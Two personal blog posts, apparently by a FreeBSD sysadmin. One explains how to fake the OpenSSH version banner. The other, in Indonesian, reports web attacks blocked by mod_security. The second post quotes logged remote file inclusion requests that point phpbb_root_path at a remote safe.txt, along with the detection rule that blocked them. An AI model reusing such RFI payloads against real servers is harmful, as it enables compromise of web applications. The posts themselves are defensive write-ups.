Service Banner Faking in FreeBSD

this is a simple howto faking banner service, Service banner often contain a lot of information like the real software running, etc. Knowing this (service banner), make our machine be more vurnerable with exploit, because it contain version number, real sofware running, etc. Keep it mind that this won’t make your machine/server more secure against exploit when you run vurnerable service. This article only aims to fake the banner and in this way, fool the script-kiddies. However, your system still be vurnerable to an exploit, if you run a vurnerable service. If a script-kiddies runs his exploit, even if he sees you don’t send out the right banner, you can still be attacked. So, always keep your system up-to-date, see this as an way to decrease the amount of attacks on your system, not as a way to be invulnerable.

let’s start changing the service banner. In this case, i will explain how to change SSH Service Banner.

Current SSH Banner = SSH-2.0-OpenSSH_x.x (default from freebsd)

Wanted SSH Banner = SSH-2.0-just_look_at_me be_with_you_forever

hmmmm….. how?? it’s so simple. just follow this step

open version.h located in /usr/src/crypto/openssh/ then edit these line :

#define SSH_VERSION (ssh_version_get())
#define SSH_RELEASE (ssh_version_get())
#define SSH_VERSION_BASE “just_look_at_me”
#define SSH_VERSION_ADDENDUM “be_with_you_forever”

save version.h and then, go to /usr/src/secure/lib/libssh . Recompile the ssh and restart your ssh service.

make obj && make depend && make && make install

/etc/rc.d/ssh restart

wanna see the changes??? just telnet to your ssh server, or maybe you can use nmap.

simple?? yeahhh…..

tested in FreeBSD 6.0-stable, Freebsd 6.2-Release, and Freebsd 6.3-PRERELEASE, and it works

And, how about in APACHE web server? ohhohoh, just use additional module called mod security, additional cool module in apache. how? read my last article in friendster blog

oks, time to sleep now………… byee

When Script Kiddies Attack

wahh……..udah masuk lagi kuliah (walopun jarang kuliah ), hummmm sekitar 1 mingguan ditinggal pulang ni serper, huakakakakak banyak bener log nya.. bejibun!!!! wakakaka emang dasarnya gw yang begok, lupak bikin crontab buat ngerotate log-log bejibun. kmaren gw liat di log webserver (mod security log), mak jang, gileee banyak banget cing!!!!! ampe puyeng gw bacanya………..

kalo gw liat dari log-log, rata rata terjadi attack 15 menit sekali.  mulai dari spam, RFI, LFI.. hummmmmmmmm……… nih sedikit gw kasi lognya (RFI):

==953aa80c==============================
Request: xxxxx.xxxxxx.x.x 72.149.42.126 – - [24/Oct/2007:23:30:33 +0700] “GET /web/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1″ 500 1353 “-” “libwww-perl/5.65″ – “-”
—————————————-
GET /web/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xxxxx.xxxx.xxxxx
User-Agent: libwww-perl/5.65
mod_security-message: Access denied with code 500. Pattern match “phpbb_root_path” at THE_REQUEST
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 19 Jun 2007 03:22:03 GMT
ETag: “8576a-549-d1366cc0;628b3780″
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
–953aa80c–

==7b81d714==============================
Request: xxxxx.xxxxx.x.x 72.149.42.126 – - [24/Oct/2007:23:30:34 +0700] “GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1″ 500 1353 “-” “libwww-perl/5.65″ – “-”
—————————————-
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xxxx.xxxxx.x.x
User-Agent: libwww-perl/5.65
mod_security-message: Access denied with code 500. Pattern match “phpbb_root_path” at THE_REQUEST
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 19 Jun 2007 03:22:03 GMT
ETag: “8576a-549-d1366cc0;62e80900″
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
–7b81d714–

 (xxxxx.xxxxx.x.x sengaja disamarkan)

itu sih cuman sebagian kecil dari log nya……. kalo gw keluarin disini, bisa mampus ntar yang bacanya -______________-.

tapi yang rada bikin sebel sih, rule buat blocking spam. wah, gila, banyak banget tuh log dari spamm, ada yang ke block, ada yang masih teros nylonong masuk -______________-.

ternyata lebi susah ngamanin web aplication ketimbang yang laen -______-